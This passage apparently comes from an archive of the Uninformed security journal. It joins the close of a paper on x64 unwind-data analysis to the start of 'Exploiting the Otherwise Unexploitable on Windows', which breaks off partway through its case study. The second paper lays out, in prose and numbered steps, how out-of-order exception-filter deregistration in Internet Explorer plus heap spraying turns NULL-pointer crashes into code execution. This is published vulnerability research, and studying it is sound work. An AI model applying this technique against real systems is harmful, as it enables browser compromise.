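Finding the function-specific handler for a faulting address is then a matter of searching the scope table. The following sketch assumes that End is exclusive and that returning the first matching entry is sufficient; how nested scopes are ordered in the table is not covered here. The structure and function names are chosen for this example.

```c
#include <stddef.h>
#include <stdint.h>

/* Mirrors C_SCOPE_TABLE_ENTRY; every field is an RVA. */
struct scope_entry {
    uint32_t begin;
    uint32_t end;
    uint32_t handler;
    uint32_t target;
};

/*
 * Return the first scope entry whose guarded range covers rva, or NULL if
 * the address is not inside any guarded region of the function.
 */
static const struct scope_entry *
find_scope(const struct scope_entry *table, uint32_t num_entries, uint32_t rva)
{
    uint32_t i;

    for (i = 0; i < num_entries; i++)
        if (rva >= table[i].begin && rva < table[i].end)
            return &table[i];
    return NULL;
}
```

The handler and target fields of the returned entry are the RVAs an annotation pass would label and, if necessary, mark as code.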
|
||||
|
||||
All of this exception handler information is useful
|
||||
because it makes it possible to annotate a function in terms of what
|
||||
exception handlers may be called during its execution. It also makes it
|
||||
possible to identify the exception handler functions that may otherwise
|
||||
not be found due to the fact that they are executed indirectly. For
|
||||
example, the function CcAcquireByteRangeForWrite in ntoskrnl.exe can be
|
||||
annotated in the following fashion:
|
||||
|
||||
|
||||
.text:0000000000434520 ; Exception handler: __C_specific_handler
.text:0000000000434520 ; Language specific handler: sub_4C7F30
.text:0000000000434520
.text:0000000000434520 CcAcquireByteRangeForWrite proc near
|
||||
|
||||
|
||||
4.2) Register Parameter Area Annotation
|
||||
|
||||
Given the requirement that the register parameter area be allocated on
|
||||
the stack in the context of a function that calls other functions, it is
|
||||
possible to statically annotate specific portions of the stack frame for
|
||||
a function as being the location of the caller's register parameter
|
||||
area. Furthermore, the location of a given function's register
|
||||
parameter area that is to be used by called functions can also be
|
||||
annotated.
|
||||
|
||||
The location of the register parameter area is always at a fixed
|
||||
location in a stack frame. Specifically, it immediately follows the
|
||||
return address on the stack. If annotations are added for CallerRCX at
|
||||
offset 0x8, CallerRDX at offset 0x10, CallerR8 at offset 0x18, and
|
||||
CallerR9 at offset 0x20, it is possible to get a better view of the
|
||||
stack frame for a given function. It also makes it easier to understand
|
||||
when and how this region of the stack is used by a function. For
|
||||
instance, the CcAcquireByteRangeForWrite function in ntoskrnl.exe makes
|
||||
use of this area to store the values of the first four parameters:
|
||||
|
||||
|
||||
.text:0000000000434520    mov     [rsp+CallerR9], r9
.text:0000000000434525    mov     dword ptr [rsp+CallerR8], r8d
.text:000000000043452A    mov     [rsp+CallerRDX], rdx
.text:000000000043452F    mov     [rsp+CallerRCX], rcx
|
||||
|
||||
|
||||
5) Conclusion
|
||||
|
||||
This paper has presented a few basic approaches that can be used to
|
||||
extract useful information from an x64 binary for the purpose of
|
||||
analysis. By analyzing the unwind information associated with
|
||||
functions, it is possible to get a better understanding of how a
|
||||
function's stack frame is laid out. Furthermore, the unwind information
|
||||
makes it possible to describe the relationship between a function and
|
||||
its exception handler(s). Looking toward the future, x64 is likely to
|
||||
become the standard architecture given Microsoft's adoption of it as
|
||||
their primary architecture. With this in mind, coming up with
|
||||
techniques to better automate the binary analysis process will become
|
||||
more necessary.
|
||||
|
||||
|
||||
Bibliography
|
||||
|
||||
[1] Microsoft Corporation. ntimage.h.
|
||||
3790 DDK header files.
|
||||
|
||||
[2] Microsoft Corporation. Exception Handling (x64).
|
||||
http://msdn2.microsoft.com/en-us/library/1eyas8tf(VS.80).aspx;
|
||||
accessed Apr 25, 2006.
|
||||
|
||||
[3] Microsoft Corporation. The Language Specific Handler.
|
||||
http://msdn2.microsoft.com/en-us/library/b6sf5kbd(VS.80).aspx;
|
||||
accessed Apr 25, 2006.
|
||||
|
||||
[4] Microsoft Corporation. Parameter Passing.
|
||||
http://msdn2.microsoft.com/en-us/library/zthk2dkh.aspx;
|
||||
accessed Apr 25, 2006.
|
||||
|
||||
[5] Microsoft Corporation. Register Usage.
|
||||
http://msdn2.microsoft.com/en-us/library/9z1stfyw(VS.80).aspx;
|
||||
accessed Apr 25, 2006.
|
||||
|
||||
[6] Microsoft Corporation. SEH in x86 Environments.
|
||||
http://msdn2.microsoft.com/en-US/library/ms253960.aspx;
|
||||
accessed Apr 25, 2006.
|
||||
|
||||
[7] Microsoft Corporation. Stack Usage.
|
||||
http://msdn2.microsoft.com/en-us/library/ew5tede7.aspx;
|
||||
accessed Apr 25, 2006.
|
||||
|
||||
[8] Microsoft Corporation. Unwind Data Definitions in C.
|
||||
http://msdn2.microsoft.com/en-us/library/ssa62fwe(VS.80).aspx;
|
||||
accessed Apr 25, 2006.
|
711
uninformed/4.5.txt
Normal file
|
@ -0,0 +1,711 @@
|
|||
Exploiting the Otherwise Unexploitable on Windows
|
||||
skywing, skape
|
||||
May 2006
|
||||
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: This paper describes a technique that can be applied in
|
||||
certain situations to gain arbitrary code execution through software
|
||||
bugs that would not otherwise be exploitable, such as NULL pointer
|
||||
dereferences. To facilitate this, an attacker gains control of the
|
||||
top-level unhandled exception filter for a process in an indirect
|
||||
fashion. While there has been previous work [1, 3] illustrating the
|
||||
usefulness in gaining control of the top-level unhandled exception
|
||||
filter, Microsoft has taken steps in XPSP2 and beyond, such as function
|
||||
pointer encoding[4], to prevent attackers from being able to overwrite
|
||||
and control the unhandled exception filter directly. While this
|
||||
security enhancement is a marked improvement, it is still possible for
|
||||
an attacker to gain control of the top-level unhandled exception filter
|
||||
by taking advantage of a design flaw in the way unhandled exception
|
||||
filters are chained. This approach, however, is limited by an attacker's
|
||||
ability to control the chaining of unhandled exception filters, such as
|
||||
through the loading and unloading of DLLs. This does reduce the global
|
||||
impact of this approach; however, there are some interesting cases where
|
||||
it can be immediately applied, such as with Internet Explorer.
|
||||
|
||||
Disclaimer: This document was written in the interest of education. The
|
||||
authors cannot be held responsible for how the topics discussed in this
|
||||
document are applied.
|
||||
|
||||
Thanks: The authors would like to thank H D Moore, and everyone who
|
||||
learns because it's fun.
|
||||
|
||||
Update: This issue has now been addressed by the patch included in
|
||||
MS06-051. A complete analysis has not yet been performed to ensure that
|
||||
it patches all potential vectors.
|
||||
|
||||
With that, on with the show...
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
In the security field, software bugs can be generically grouped into two
|
||||
categories: exploitable or non-exploitable. If a software bug is
|
||||
exploitable, then it can be leveraged to the advantage of the attacker,
|
||||
such as to gain arbitrary code execution. However, if a software bug is
|
||||
non-exploitable, then it is not possible for the attacker to make use of
|
||||
it for anything other than perhaps crashing the application. In more
|
||||
cases than not, software bugs will fall into the category of being
|
||||
non-exploitable simply because they typically deal with common mistakes
|
||||
or invalid assumptions that are not directly related to buffer
|
||||
management or loop constraints. This can be frustrating during auditing
|
||||
and product analysis from an assessment standpoint. With that in mind,
|
||||
it only makes sense to try to think of ways to turn otherwise
|
||||
non-exploitable issues into exploitable issues.
|
||||
|
||||
In order to accomplish this feat, it's first necessary to try to
|
||||
consider execution vectors that could be redirected to code that the
|
||||
attacker controls after triggering a non-exploitable bug, such as a NULL
|
||||
pointer dereference. For starters, it is known that the triggering of a
|
||||
NULL pointer dereference will cause an access violation exception to be
|
||||
dispatched. When this occurs, the user-mode exception dispatcher will
|
||||
call the registered exception handlers for the thread that generated the
|
||||
exception, allowing each the opportunity to handle the exception. If
|
||||
none of the exception handlers know what to do with it, the user-mode
|
||||
exception dispatcher will call the top-level unhandled exception filter
|
||||
(UEF) via kernel32!UnhandledExceptionFilter (if one has been set). The
|
||||
implementation of a function that is set as the registered top-level UEF
|
||||
is not specified, but in most cases it will be designed to pass
|
||||
exceptions that it cannot handle onto the top-level UEF that was
|
||||
registered previously, effectively creating a chain of UEFs. This
|
||||
process will be explained in more detail in the next chapter.
|
||||
|
||||
Aside from the exception dispatching process, there are not any other
|
||||
controllable execution vectors that an attacker might be able to
|
||||
redirect without some other situation-specific conditions. For that
|
||||
reason, the most important place to look for a point of redirection is
|
||||
within the exception dispatching process itself. This will provide a
|
||||
generic means of gaining execution control for any bug that can be made
|
||||
to crash an application.
|
||||
|
||||
Since the first part of the exception dispatching process is the calling
|
||||
of registered exception handlers for the thread, it may make sense to
|
||||
see if there are any controllable execution paths taken by the
|
||||
registered exception handlers at the time that the exception is
|
||||
triggered. This may work in some cases, but is not universal and
|
||||
requires analysis of the specific exception handler routines. Without
|
||||
having an ability to corrupt the list of exception handlers, there is
|
||||
likely to be no other method of redirecting this phase of the exception
|
||||
dispatching process.
|
||||
|
||||
If none of the registered exception handlers can be redirected, one must
|
||||
look toward a method that can be used to redirect the unhandled
|
||||
exception filter. This could be accomplished by changing the function
|
||||
pointer to call into controlled code as illustrated in [1, 3]. However,
|
||||
Microsoft has taken steps in XPSP2, such as encoding the function
|
||||
pointer that represents the top-level UEF[4]. This no longer makes it
|
||||
feasible to directly overwrite the global variable that contains the
|
||||
top-level UEF. With that in mind, it may also make sense to look at the
|
||||
function associated with top-level UEF at the time that the exception is
|
||||
dispatched in order to see if the function itself has any meaningful way
|
||||
to redirect its execution.
|
||||
|
||||
From this initial analysis, one is left with being required to perform
|
||||
an application-dependent analysis of the registered exception handlers
|
||||
and UEFs that exist at the time that the exception is dispatched. Though
|
||||
this may be useful in some situations, they are likely to be few and far
|
||||
between. For that reason, it makes sense to try to dive one layer
|
||||
deeper to learn more about the exception dispatching process. Chapter 3
|
||||
will describe in more detail how unhandled exception filters work,
|
||||
setting the stage for the focus of this paper. Based on that
|
||||
understanding, chapter 4 will expound upon an approach that can be used
|
||||
to gain indirect control of the top-level UEF. Finally, chapter 5 will
|
||||
formalize the results of this analysis in an example of a working
|
||||
exploit that takes advantage of one of the many NULL pointer
|
||||
dereferences in Internet Explorer to gain arbitrary code execution.
|
||||
|
||||
|
||||
3) Understanding Unhandled Exception Filters
|
||||
|
||||
This chapter provides an introductory background into the way unhandled
|
||||
exception filters are registered and how the process of filtering an
|
||||
exception that is not handled actually works. This information is
|
||||
intended to act as a base for understanding the attack vector described
|
||||
in chapter 4. If the reader already has sufficient understanding of the
|
||||
way unhandled exception filters operate, feel free to skip ahead.
|
||||
|
||||
|
||||
3.1) Setting the Top-Level UEF
|
||||
|
||||
In order to make it possible for applications to handle all exceptions
|
||||
on a process-wide basis, the exception dispatcher exposes an interface
|
||||
for registering an unhandled exception filter. The purpose of the
|
||||
unhandled exception filter is entirely application specific. It can be
|
||||
used to log extra information about an unhandled exception, perform some
|
||||
advanced error recovery, handle language-specific exceptions, or any
|
||||
sort of other task that may need to be taken when an exception occurs
|
||||
that is not handled. To specify a function that should be used as the
|
||||
top-level unhandled exception filter for the process, a call must be
|
||||
made to kernel32!SetUnhandledExceptionFilter which is prototyped as[6]:
|
||||
|
||||
|
||||
LPTOP_LEVEL_EXCEPTION_FILTER SetUnhandledExceptionFilter(
|
||||
    LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter
|
||||
);
|
||||
|
||||
When called, this function will take the function pointer passed in as
|
||||
the lpTopLevelExceptionFilter argument and encode it using
|
||||
kernel32!RtlEncodePointer. The result of the encoding will be stored in
|
||||
the global variable kernel32!BasepCurrentTopLevelFilter, thus
|
||||
superseding any previously established top-level filter. The previous
|
||||
value stored within this global variable is decoded using
|
||||
kernel32!RtlDecodePointer and returned to the caller. Again, the
|
||||
encoding and decoding of this function pointer is intended to prevent
|
||||
attackers from being able to use an arbitrary memory overwrite to
|
||||
redirect it as has been done pre-XPSP2.
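
The bookkeeping described above can be sketched in portable C. This is
only a minimal model under stated assumptions, not the kernel32
implementation: the names model_set_uef, model_stored_raw and
MODEL_COOKIE are hypothetical, filters are represented as plain
addresses, and the XOR with a fixed constant merely stands in for
whatever transformation the real pointer encoding applies.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical stand-in for the per-process secret used by the encoder. */
#define MODEL_COOKIE ((uintptr_t)0x5a5aa5a5u)

/* Models the global that holds the ENCODED top-level filter.
 * It starts out as the encoding of "no filter" (address 0). */
static uintptr_t model_stored_filter = MODEL_COOKIE;

/* Assumed encoding: XOR with the cookie. Decoding is the same operation. */
uintptr_t model_encode(uintptr_t address) { return address ^ MODEL_COOKIE; }
uintptr_t model_decode(uintptr_t value)   { return value ^ MODEL_COOKIE; }

/* Stores the encoded new filter and returns the decoded previous one,
 * mirroring the contract described in the text. */
uintptr_t model_set_uef(uintptr_t new_filter)
{
    uintptr_t previous = model_decode(model_stored_filter);

    model_stored_filter = model_encode(new_filter);
    /* Round-trip sanity check: decoding must give back what was set. */
    assert(model_decode(model_stored_filter) == new_filter);
    return previous;
}

/* Exposes the raw (encoded) value, i.e. what a memory overwrite would see. */
uintptr_t model_stored_raw(void) { return model_stored_filter; }
```

In this model, calling model_set_uef(0x1000) and then
model_set_uef(0x2000) returns 0 and 0x1000 respectively, while the
stored value never equals the raw address. That mismatch is what makes
a blind overwrite of the global impractical without knowing the secret.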
|
||||
|
||||
There are two reasons that kernel32!SetUnhandledExceptionFilter returns
|
||||
a pointer to the original top-level UEF. First, it makes it possible to
|
||||
restore the original top-level UEF at some point in the future. Second,
|
||||
it makes it possible to create an implicit ``chain'' of UEFs. In this
|
||||
design, each UEF can make a call down to the previously registered
|
||||
top-level UEF by doing something like the pseudo code below:
|
||||
|
||||
|
||||
... app specific handling ...
|
||||
|
||||
if (!IsBadCodePtr(PreviousTopLevelUEF))
|
||||
    return PreviousTopLevelUEF(ExceptionInfo);
|
||||
else
|
||||
    return EXCEPTION_CONTINUE_SEARCH;
|
||||
|
||||
When a block of code that has registered a top-level UEF wishes to
|
||||
deregister itself, it does so by setting the top-level UEF to the value
|
||||
that was returned from its call to kernel32!SetUnhandledExceptionFilter.
|
||||
The reason it does it this way is because there is no true list of
|
||||
unhandled exception filters that is maintained. This method of
|
||||
deregistering has one very important property that will serve as the
|
||||
crux of this document. Since deregistration happens in this fashion,
|
||||
the register and deregister operations associated with a top-level UEF
|
||||
must occur in symmetric order.
|
||||
|
||||
In one example, the top-level UEF Fx is registered, returning Nx as the
|
||||
previous top-level UEF. Following that, Gx is registered, returning Fx
|
||||
as the previous value. After some period of time, Gx is deregistered by
|
||||
setting Fx as the top-level UEF, thus returning the top-level UEF to the
|
||||
value it contained before Gx was registered. Finally, Fx deregisters by
|
||||
setting Nx as the top-level UEF.
|
||||
|
||||
|
||||
3.2) Handling Unhandled Exceptions
|
||||
|
||||
When an exception goes through the initial phase of the exception
|
||||
dispatching process and is not handled by any of the registered
|
||||
exception handlers for the thread that the exception occurred in, the
|
||||
exception dispatcher must take one final stab at getting it handled
|
||||
before forcing the application to terminate. One of the options the
|
||||
exception dispatcher has at this point is to pass the exception to a
|
||||
debugger, assuming one is attached. Otherwise, it has no choice but to
|
||||
try to handle the exception internally and abort the application if that
|
||||
fails. To allow this to happen, applications can make a call to the
|
||||
unhandled exception filter associated with the process as described in [5].
|
||||
In the general case, calling the unhandled exception filter will result
|
||||
in kernel32!UnhandledExceptionFilter being called with information about
|
||||
the exception being dispatched.
|
||||
|
||||
The job of kernel32!UnhandledExceptionFilter is twofold. First, if a
|
||||
debugger is not present, it must make a call to the top-level UEF
|
||||
registered with the process. The top-level UEF can then attempt to
|
||||
handle the exception, possibly recovering and allowing execution to
|
||||
continue, such as by returning EXCEPTION_CONTINUE_EXECUTION. Failing
|
||||
that, it can either forcefully terminate the process, typically by
|
||||
returning EXCEPTION_EXECUTE_HANDLER or allow the normal error reporting
|
||||
dialog to be displayed by returning EXCEPTION_CONTINUE_SEARCH. If a
|
||||
debugger is present, the unhandled exception filter will attempt to pass
|
||||
the exception on to the debugger in order to give it a chance to handle
|
||||
the exception. When this occurs, the top-level UEF is not called. This
|
||||
is important to remember as the paper goes on, as it can be a source of
|
||||
trouble if one forgets this fact.
|
||||
|
||||
When operating with no debugger present,
|
||||
kernel32!UnhandledExceptionFilter will attempt to decode the function
|
||||
pointer associated with the top-level UEF by calling
|
||||
kernel32!RtlDecodePointer on the global variable that contains the
|
||||
top-level UEF, kernel32!BasepCurrentTopLevelFilter, as shown
|
||||
below:
|
||||
|
||||
|
||||
7c862cc1 ff35ac33887c push dword ptr [kernel32!BasepCurrentTopLevelFilter]
|
||||
7c862cc7 e8e1d6faff call kernel32!RtlDecodePointer (7c8103ad)
|
||||
|
||||
If the value returned from kernel32!RtlDecodePointer is not NULL, then a
|
||||
call is made to the now-decoded top-level UEF function, passing the
|
||||
exception information on:
|
||||
|
||||
|
||||
7c862ccc 3bc7 cmp eax,edi
|
||||
7c862cce 7415 jz kernel32!UnhandledExceptionFilter+0x15b (7c862ce5)
|
||||
7c862cd0 53 push ebx
|
||||
7c862cd1 ffd0 call eax
|
||||
|
||||
The return value of the filter will control whether or not the
|
||||
application continues execution, terminates, or reports an error and
|
||||
terminates.
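
The decision flow described in this section can be summarized with a
small portable C model. It is a sketch under stated assumptions rather
than the real routine: model_unhandled_exception_filter, the
model_outcome enumeration and the two example filters are hypothetical
names. Only the three disposition values are taken from the Windows SDK
headers.

```c
#include <assert.h>
#include <stddef.h>

/* Disposition values as defined in the Windows SDK headers. */
#define EXCEPTION_EXECUTE_HANDLER      1
#define EXCEPTION_CONTINUE_SEARCH      0
#define EXCEPTION_CONTINUE_EXECUTION (-1)

typedef long (*model_filter_fn)(void *exception_info);

/* Hypothetical labels for what happens to the process afterwards. */
enum model_outcome {
    MODEL_PASSED_TO_DEBUGGER,
    MODEL_RESUME_EXECUTION,
    MODEL_TERMINATE,
    MODEL_REPORT_AND_TERMINATE
};

/* Models the flow described for kernel32!UnhandledExceptionFilter. */
enum model_outcome model_unhandled_exception_filter(int debugger_present,
                                                    model_filter_fn top_level,
                                                    void *exception_info)
{
    long disposition = EXCEPTION_CONTINUE_SEARCH;

    assert(exception_info != NULL);

    /* With a debugger attached the top-level UEF is never called. */
    if (debugger_present)
        return MODEL_PASSED_TO_DEBUGGER;

    /* Only call the (already decoded) filter if one has been set. */
    if (top_level != NULL)
        disposition = top_level(exception_info);

    switch (disposition) {
    case EXCEPTION_CONTINUE_EXECUTION:
        return MODEL_RESUME_EXECUTION;
    case EXCEPTION_EXECUTE_HANDLER:
        return MODEL_TERMINATE;
    default: /* EXCEPTION_CONTINUE_SEARCH */
        return MODEL_REPORT_AND_TERMINATE;
    }
}

/* Example filters, for illustration only. */
long model_filter_recover(void *info) { (void)info; return EXCEPTION_CONTINUE_EXECUTION; }
long model_filter_give_up(void *info) { (void)info; return EXCEPTION_EXECUTE_HANDLER; }
```

The debugger branch is placed first on purpose: it is the reason an
attack built on the top-level UEF appears to do nothing when the target
is being debugged.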
|
||||
|
||||
|
||||
3.3) Uses for Unhandled Exception Filters
|
||||
|
||||
In most cases, unhandled exception filters are used for
|
||||
language-specific exception handling. This usage is all done
|
||||
transparently to programmers of the language. For instance, C++ code
|
||||
will typically register an unhandled exception filter through
|
||||
CxxSetUnhandledExceptionFilter during CRT initialization as called from
|
||||
the entry point associated with the program or shared library.
|
||||
Likewise, C++ will typically deregister the unhandled exception filter
|
||||
that it registers by calling CxxRestoreUnhandledExceptionFilter during
|
||||
program termination or shared library unloading.
|
||||
|
||||
Other uses include programs that wish to do advanced error reporting or
|
||||
information collection prior to allowing an application to terminate due
|
||||
to an unhandled exception.
|
||||
|
||||
|
||||
4) Gaining Control of the Unhandled Exception Filter
|
||||
|
||||
At this point, the only feasible vector for gaining control of the
|
||||
top-level UEF is to cause calls to be made to
|
||||
kernel32!SetUnhandledExceptionFilter. This is primarily due to the fact
|
||||
that the global variable has the current function pointer encoded. One
|
||||
could consider attempting to cause code to be redirected directly to
|
||||
kernel32!SetUnhandledExceptionFilter, but doing so would require some
|
||||
kind of otherwise-exploitable vulnerability in an application, thus
|
||||
making it not useful in the context of this document.
|
||||
|
||||
|
||||
Given these restrictions, it makes sense to think a little bit more
|
||||
about the process involved in registering and deregistering UEFs. Since
|
||||
the chain of registered UEFs is implicit, it may be possible to cause
|
||||
that chain to become corrupt or invalid in some way that might be
|
||||
useful. One of the requirements that is known about the registration
|
||||
process for top-level UEFs is that the register and deregister
|
||||
operations must be symmetric. What happens if they aren't, though?
|
||||
Consider the following example where Fx and Gx are registered and
|
||||
deregistered, but in asymmetric order.
|
||||
|
||||
In this example, Fx and Gx are registered first. Following that, Fx is
|
||||
deregistered prior to deregistering Gx, thus making the operation
|
||||
asymmetrical. As a result of Fx deregistering first, the top-level UEF
|
||||
is set to Nx, even though Gx should technically still be a part of the
|
||||
chain. Finally, Gx deregisters, setting the top-level UEF to Fx even
|
||||
though Fx had been previously deregistered. This is obviously incorrect
|
||||
behavior, but the code associated with Gx has no idea that Fx has been
|
||||
deregistered due to the implicit chain that is created.
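
The effect of the ordering can be reproduced with a few lines of
portable C. This is a sketch, not Windows code: filters are modeled as
the integer tags NX, FX and GX, and model_set_uef and model_run are
hypothetical names that only imitate the "set new, return previous"
contract described earlier.

```c
#include <assert.h>

/* Filters are modeled as integer tags; NX is the original filter. */
enum { NX = 0, FX = 1, GX = 2 };

static int model_top_level = NX;

/* Installs new_filter and returns the one it replaced. */
int model_set_uef(int new_filter)
{
    int previous = model_top_level;

    model_top_level = new_filter;
    return previous;
}

/* Registers F then G, deregisters them in the requested order, and
 * returns whichever filter is left installed at the end. */
int model_run(int deregister_f_first)
{
    int saved_by_f, saved_by_g;

    model_top_level = NX;
    saved_by_f = model_set_uef(FX);  /* F remembers NX */
    saved_by_g = model_set_uef(GX);  /* G remembers FX */
    assert(saved_by_f == NX && saved_by_g == FX);

    if (deregister_f_first) {
        model_set_uef(saved_by_f);   /* top-level becomes NX, G is dropped */
        model_set_uef(saved_by_g);   /* top-level becomes FX again: stale */
    } else {
        model_set_uef(saved_by_g);   /* symmetric: back to FX */
        model_set_uef(saved_by_f);   /* then back to NX */
    }
    return model_top_level;
}
```

In this model, model_run(0) ends with NX installed, whereas
model_run(1) ends with FX installed even though F has already
deregistered itself.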
|
||||
|
||||
If asymmetric registration of UEFs can be made to occur, it might be
|
||||
possible for an attacker to gain control of the top-level UEF. Consider
|
||||
for a moment that the register and deregister operations in the example
|
||||
above occur during DLL load and unload, respectively. If that is
|
||||
the case, then after deregistration occurs, the DLLs associated with the
|
||||
UEFs will be unloaded. This will leave the top-level UEF set to Fx
|
||||
which now points to an invalid region of memory. If an exception occurs
|
||||
after this point and is not handled by a registered exception handler,
|
||||
the unhandled exception filter will be called. If a debugger is not
|
||||
attached, the top-level UEF Fx will be called. Since Fx points to
|
||||
memory that is no longer associated with the DLL that contained Fx, the
|
||||
process will terminate --- or worse.
|
||||
|
||||
From a security perspective, the act of leaving a dangling function
|
||||
pointer that now points to unallocated memory can be a dream come true.
|
||||
If a scenario such as this occurs, an attacker can attempt to consume
|
||||
enough memory that will allow them to store arbitrary code at the
|
||||
location that the function originally resided. In the event that the
|
||||
function is called, the attacker's arbitrary code will be executed
|
||||
rather than the code that was originally at that location. In the
|
||||
case of the top-level UEF, the only thing that an attacker would need to
|
||||
do in order to cause the function pointer to be called is to generate an
|
||||
unhandled exception, such as a NULL pointer dereference.
|
||||
|
||||
All of these details combine to provide a feasible vector for executing
|
||||
arbitrary code. First, it's necessary to be able to cause at least two
|
||||
DLLs that set UEFs to be deregistered asymmetrically, thus leaving the
|
||||
top-level UEF pointing to invalid memory. Second, it's necessary to
|
||||
consume enough memory that attacker controlled code can reside at the
|
||||
location that one of the UEF functions originally resided. Finally, an
|
||||
exception must be generated that causes the top-level UEF to be called,
|
||||
thus executing the attacker's arbitrary code.
|
||||
|
||||
The big question, though, is how feasible is it to really be able to
|
||||
control the registering and deregistering of UEFs? To answer that,
|
||||
chapter 5 provides a case study on one such application where it's all
|
||||
too possible: Internet Explorer.
|
||||
|
||||
|
||||
5) Case Study: Internet Explorer
|
||||
|
||||
Unfortunately for Internet Explorer, it's time for it to once again don
|
||||
the all-too-exploitable hat and tell us about how it can be used as a
|
||||
medium to gain arbitrary code execution with all otherwise
|
||||
non-exploitable bugs. In this approach, Internet Explorer is used as a
|
||||
medium for causing DLLs that register and deregister top-level UEFs to
|
||||
be loaded and unloaded. One way in which an attacker can accomplish
|
||||
this is by using Internet Explorer's facilities for instantiating COM
|
||||
objects from within the browser. This can be accomplished either by
|
||||
using the new ActiveXObject construct in JavaScript or by using the HTML
|
||||
OBJECT tag.
|
||||
|
||||
In either case, when a COM object is being instantiated, the DLL
|
||||
associated with that COM object will be loaded into memory if the object
|
||||
instance is created using the INPROC_SERVER. When this happens, the COM
|
||||
object's DllMain will be called. If the DLL has an unhandled exception
|
||||
filter, it may be registered during CRT initialization as called from
|
||||
the DLL's entry point. This takes care of the registering of UEFs, so
|
||||
long as COM objects that are associated with DLLs that set UEFs can be
|
||||
found.
|
||||
|
||||
To control the deregister phase, it is necessary to somehow cause the
|
||||
DLLs associated with the previously instantiated COM objects to be
|
||||
unloaded. One approach that can be taken to do this is attempt to
|
||||
leverage the locations that ole32!CoFreeUnusedLibrariesEx is called
|
||||
from. One particular place that it's called from is during the closure
|
||||
of an Internet Explorer window that once hosted the COM object. When
|
||||
this function is called, all currently loaded COM DLLs will have their
|
||||
DllCanUnloadNow routines called. If the routine returns S_OK, such as
|
||||
when there are no outstanding references to COM objects hosted by the
|
||||
DLL, then the DLL can be unloaded.
|
||||
|
||||
Now that techniques for controlling the loading and unloading of DLLs
|
||||
that set UEFs have been identified, it's necessary to come up with an
|
||||
implementation that will allow the deregister phase to occur
|
||||
asymmetrically. One method that can be used to accomplish this is
|
||||
illustrated by the registration phase and the deregistration
|
||||
phase described below.
|
||||
|
||||
Registration:
|
||||
|
||||
1. Open window #1
|
||||
2. Instantiate COMObject1
|
||||
3. Load DLL 1
|
||||
4. SetUnhandledExceptionFilter(Fx) => Nx
|
||||
|
||||
5. Open window #2
|
||||
6. Instantiate COMObject2
|
||||
7. Load DLL 2
|
||||
8. SetUnhandledExceptionFilter(Gx) => Fx
|
||||
|
||||
In the example described above, two windows are opened, each of which
|
||||
registers a UEF by way of a DLL that implements a specific COM object.
|
||||
In this example, the first window instantiates COMObject1 which is
|
||||
implemented by DLL 1. When DLL 1 is loaded, it registers a top-level
|
||||
UEF Fx. Once that completes, the second window is opened which
|
||||
instantiates COMObject2, thus causing DLL 2 to be loaded which also
|
||||
registers a top-level UEF, Gx. Once these operations complete, DLL 1
|
||||
and DLL 2 are still resident in memory and the top-level UEF points to
|
||||
Gx.
|
||||
|
||||
To gain control of the top-level UEF, Fx and Gx will need to be
|
||||
deregistered asymmetrically. To accomplish this, DLL 1 must be unloaded
|
||||
before DLL 2. This can be done by closing the window that hosts
|
||||
COMObject1, thus causing ole32!CoFreeUnusedLibrariesEx to be called
|
||||
which results in DLL 1 being unloaded. Following that, the window that
|
||||
hosts COMObject2 should be closed, once again causing unused libraries
|
||||
to be freed and DLL 2 unloaded. The steps below illustrate this process.
|
||||
|
||||
Deregistration:
|
||||
|
||||
1. Close window #1
|
||||
2. CoFreeUnusedLibrariesEx
|
||||
3. Unload DLL 1
|
||||
4. SetUnhandledExceptionFilter(Nx) => Gx
|
||||
|
||||
5. Close window #2
|
||||
6. CoFreeUnusedLibrariesEx
|
||||
7. Unload DLL 2
|
||||
8. SetUnhandledExceptionFilter(Fx) => Nx
|
||||
|
||||
After the deregistration steps above complete, Fx will be the top-level UEF for
|
||||
the process, even though the DLL that hosts it, DLL 1, has been
|
||||
unloaded. If an exception occurs at this point in time, the unhandled
|
||||
exception filter will make a call to a function that now points to an
|
||||
invalid region of memory.
|
||||
|
||||
At this point, an attacker now has reasonable control over the top-level
|
||||
UEF but is still in need of some approach that can be used to place his or
|
||||
her code at the location that Fx resided at. To accomplish this,
|
||||
attackers can make use of the heap-spraying[8, 7] technique that has been
|
||||
commonly applied to browser-based vulnerabilities. The purpose of the
|
||||
heap-spraying technique is to consume an arbitrary amount of memory that
|
||||
results in the contents of the heap growing toward a specific address
|
||||
region. The contents, or spray data, is arbitrary code that will result
|
||||
in an attacker's direct or indirect control of execution flow once the
|
||||
vulnerability is triggered. For the purpose of this paper, the trigger
|
||||
is the generation of an arbitrary exception.
|
||||
|
||||
As stated above, the heap-spraying technique can be used to place code
|
||||
at the location that Fx resided. However, this is limited by whether or
|
||||
not that location is close enough to the heap to be a practical target
|
||||
for heap-spraying. In particular, if the heap is growing from
|
||||
0x00480000 and the DLL that contains Fx was loaded at 0x7c800000, it
|
||||
would be a requirement that roughly 1,988 MB (about 1.94 GB) of data be placed in the
|
||||
heap. That is, of course, assuming that the target machine has enough
|
||||
memory to contain this allocation (across RAM and swap). Not to mention
|
||||
the fact that spraying that much data could take an inordinate amount of
|
||||
time depending on the speed of the machine. For these reasons, it is
|
||||
typically necessary for the DLL that contains Fx in this example
|
||||
scenario to be mapped at an address that is as close as possible to a
|
||||
region that the heap is growing from.
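
The distance estimate above is simple address arithmetic, which the
following portable C sketch makes explicit. The helper names
model_spray_bytes and model_spray_mib are hypothetical, and the model
assumes 32-bit addresses and a heap that grows contiguously upward,
which is a simplification of real heap behavior.

```c
#include <assert.h>
#include <stdint.h>

/* Bytes that must be filled for a heap growing upward from heap_base
 * to reach the target address. */
uint32_t model_spray_bytes(uint32_t heap_base, uint32_t target)
{
    assert(target >= heap_base);
    return target - heap_base;
}

/* The same distance in mebibytes (1 MiB = 1048576 bytes), rounded up. */
uint32_t model_spray_mib(uint32_t heap_base, uint32_t target)
{
    uint32_t bytes = model_spray_bytes(heap_base, target);

    return bytes / 1048576u + (bytes % 1048576u != 0u ? 1u : 0u);
}
```

For the addresses used above, model_spray_bytes(0x00480000, 0x7c800000)
gives 0x7c380000 bytes, which model_spray_mib rounds up to 1988 MiB. A
DLL mapped at a hypothetical address such as 0x10000000 would need
about 252 MiB instead, which shows why a low load address matters.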
|
||||
|
||||
During the research of this attack vector, it was found that all of the
|
||||
COM DLLs provided by Microsoft on XPSP2 are compiled to load at higher
|
||||
addresses which make them challenging to reach with heap-spraying, but
|
||||
